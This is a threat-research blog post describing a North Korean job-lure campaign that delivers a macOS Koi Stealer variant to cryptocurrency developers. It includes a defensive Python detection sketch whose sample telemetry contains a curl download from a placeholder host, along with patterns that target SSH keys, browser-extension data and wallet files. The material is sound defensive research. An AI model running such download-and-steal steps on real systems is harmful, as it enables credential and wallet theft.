North Korean Hackers Target macOS With New Crypto Malware
The Skinny
- macOS variant discovered: North Korean hackers have deployed a newly identified version of Koi Stealer malware to infiltrate cryptocurrency and blockchain developers.
- Sophisticated social engineering: Attackers pose as recruiters to trick victims into installing malware disguised as legitimate software updates.
- Rising threat to crypto firms: The campaign underscores the growing cybersecurity risks to cryptocurrency companies and the increasing sophistication of North Korean cyber operations.
North Korea’s cyber warfare tactics have evolved once again with the adaptation of a known Windows malware to infiltrate macOS environments. Palo Alto Networks Unit 42 has uncovered a sophisticated campaign in which suspected North Korean hackers deploy a previously undocumented macOS variant of Koi Stealer malware.
This operation, aimed at software developers in the cryptocurrency industry, underscores the increasing adaptability and persistence of North Korean threat actors.
The Campaign: A Sophisticated Social Engineering Threat
Unit 42 researchers have been tracking a campaign that manipulates software developers into installing malware under the guise of a legitimate job recruitment process. North Korean state-sponsored threat actors pose as potential employers, leveraging job platforms, email, and social media to target professionals in cryptocurrency and blockchain industries.
The newly discovered malware is part of a broader social engineering campaign in which attackers trick victims into installing malware disguised as legitimate software updates. Once deployed, the malware steals sensitive credentials, cryptocurrency wallets, and other critical data.
This finding highlights several critical cybersecurity concerns:
- First-ever documented macOS variant of Koi Stealer: Due to the increased targeting of macOS users by North Korea’s hacking groups, we observed an adaptation of Windows malware to macOS.
- Targeted social engineering tactics: This attack aligns with past FBI warnings about North Korea’s sophisticated job-themed cyber lures.
- Rising threat to cryptocurrency firms: The campaign is a direct threat to software developers, cryptocurrency exchanges and financial institutions.
The Growing North Korean Cyber Threat
North Korea’s interest in cryptocurrency is well-documented. Unlike other nation-state threat groups that typically focus on cyber espionage and have narrow targeting aligned with geopolitical interests, North Korea’s cyber operations are uniquely and aggressively financially motivated.
In an effort to fund their regime, they cast a wide net — targeting any individual or organization even remotely connected to cryptocurrency. This opportunistic approach makes them a risk to a broader range of industries, turning virtually anyone dealing in digital assets into a potential target.
While the attack methods are not entirely new, the focus on macOS platforms is a growing threat. According to our telemetry, attackers are focusing on Japan and the US, signaling a deliberate and strategic targeting of key global cryptocurrency and financial markets.
The campaign mirrors tactics seen in previous North Korean cyber espionage operations. Attackers contact software developers under the guise of recruiters, convincing them to install what appears to be an industry-relevant software package. Instead, they unknowingly grant access to Koi Stealer and RustDoor malware, which operate with advanced evasion techniques designed to bypass macOS security features.
The Technical Breakdown: How the Attack Works
Unit 42 researchers uncovered three key phases in this attack:
- Initial infection: Victims execute a fake job interview project within Visual Studio, triggering the download of RustDoor and Koi Stealer malware.
- Persistence and escalation: The malware, once executed, attempts to steal sensitive data, including credentials stored in browser extensions like LastPass.
- Data exfiltration: Attackers collect critical financial information, cryptocurrency wallets, SSH keys, and other confidential data before sending it to a remote command-and-control (C2) server.
Unlike traditional phishing campaigns, which rely on mass email distribution, this attack is more targeted — focusing on individuals with access to cryptocurrency exchanges and blockchain projects.
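As an added illustration that is not from Unit 42 or the original post, the Python sketch below turns the three phases above into a detection rule over constructed endpoint telemetry: a process descended from a developer tool that spawns a download, then reads SSH keys, browser-extension storage and wallet files, then opens an outbound connection. The process names, paths and addresses are assumptions, not indicators from the report.

```python
import re
from collections import defaultdict

# Constructed endpoint telemetry, not taken from the Unit 42 report. Each record is
# (seq, process, parent, event, detail); names, paths and addresses are illustrative.
SAMPLE_EVENTS = [
    (1, "Code Helper", "Visual Studio", "exec", "/bin/sh -c curl -s http://EXAMPLE-PLACEHOLDER/u -o /tmp/update"),
    (2, "update", "Code Helper", "exec", "/tmp/update"),
    (3, "update", "Code Helper", "file_read", "/Users/dev/.ssh/id_ed25519"),
    (4, "update", "Code Helper", "file_read",
     "/Users/dev/Library/Application Support/Google/Chrome/Default/Local Extension Settings/EXTID_PLACEHOLDER/000003.log"),
    (5, "update", "Code Helper", "file_read", "/Users/dev/Library/Application Support/SomeWallet/wallet.dat"),
    (6, "update", "Code Helper", "net_connect", "203.0.113.10:443"),
    (7, "Code Helper", "Visual Studio", "file_read", "/Users/dev/project/src/main.rs"),   # normal IDE activity
    (8, "ssh", "Terminal", "file_read", "/Users/dev/.ssh/id_ed25519"),                   # benign: no IDE lineage
    (9, "ssh", "Terminal", "net_connect", "198.51.100.7:22"),
]

IDE_NAMES = {"Visual Studio", "Code", "Code Helper"}   # assumed developer-tool process names
DOWNLOADER = re.compile(r"\b(curl|wget)\b")
SENSITIVE = {                                           # assumed locations for the data classes the post names
    "ssh_key": re.compile(r"/\.ssh/"),
    "browser_extension": re.compile(r"/Local Extension Settings/"),
    "crypto_wallet": re.compile(r"wallet", re.IGNORECASE),
}

def detect(events):
    """Return alerts for (a) a download spawned from an IDE lineage and (b) a process in that
    lineage that reads two or more sensitive data classes and then connects outbound."""
    parent = {p: pp for _, p, pp, ev, _ in events if ev == "exec"}   # process -> parent, from exec events

    def ide_lineage(proc, depth=4):
        while proc and depth:           # walk up at most `depth` ancestors
            if proc in IDE_NAMES:
                return True
            proc, depth = parent.get(proc), depth - 1
        return False

    touched, alerts = defaultdict(set), []
    for seq, proc, pp, ev, detail in sorted(events):
        if ev == "exec" and DOWNLOADER.search(detail) and ide_lineage(pp):
            alerts.append({"seq": seq, "process": proc, "stage": "ide_spawned_download"})
        elif ev == "file_read":
            touched[proc].update(k for k, rx in SENSITIVE.items() if rx.search(detail))
        elif ev == "net_connect" and len(touched[proc]) >= 2 and ide_lineage(proc):
            alerts.append({"seq": seq, "process": proc, "stage": "collect_then_exfil",
                           "data": sorted(touched[proc]), "remote": detail})
    return alerts
```

The benign `ssh` events show why both conditions (IDE lineage and multiple data classes) are required before alerting on a network connection.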
How Organizations Can Protect Themselves
With social engineering attacks growing more sophisticated, organizations must take proactive steps to defend against threats like Koi Stealer and RustDoor:
- Employee Awareness: Companies should educate employees about phishing and job-themed recruitment scams.
- Zero-Trust Architecture: Organizations should enforce least-privilege access to limit exposure to malicious applications.
- Regular Security Audits: Continuous monitoring and threat hunting can help identify vulnerabilities before they are exploited.
A Call to Action
The discovery of Koi Stealer for macOS, together with other recently discovered campaigns carried out by North Korean actors, highlights the need for increased awareness. Nation-state actors are evolving, and defenders must adapt just as quickly. The cryptocurrency industry, in particular, remains a high-value target.
Organizations should take immediate action to strengthen their defenses, educate employees, and implement advanced threat detection tools. As Unit 42 continues to monitor the threat landscape, it is clear that North Korean cyber operations are becoming more ambitious, more sophisticated, and more dangerous.
With North Korean cyber actors showing no signs of slowing down, the global cybersecurity community must remain proactive, prepared, and ahead of the evolving threat landscape.

Adva Gabay | MacOS Research Team Lead
Adva Gabay is the leader of the macOS research team for Cortex XDR, focusing on low-level research, coverage, and detection initiatives. Her experience includes low-level and network research across various operating systems, specializing in macOS, as well as reverse engineering and the development of research tools for these platforms.

Daniel Frank | Threat Research Team Leader
Daniel Frank is the Threat Research Team Leader at Palo Alto Networks, with over a decade of experience. His core roles include researching emerging threats, reverse-engineering malware and threat hunting. Frank has showcased his research in different cybersecurity conferences over the years. He has a BSc degree in information systems.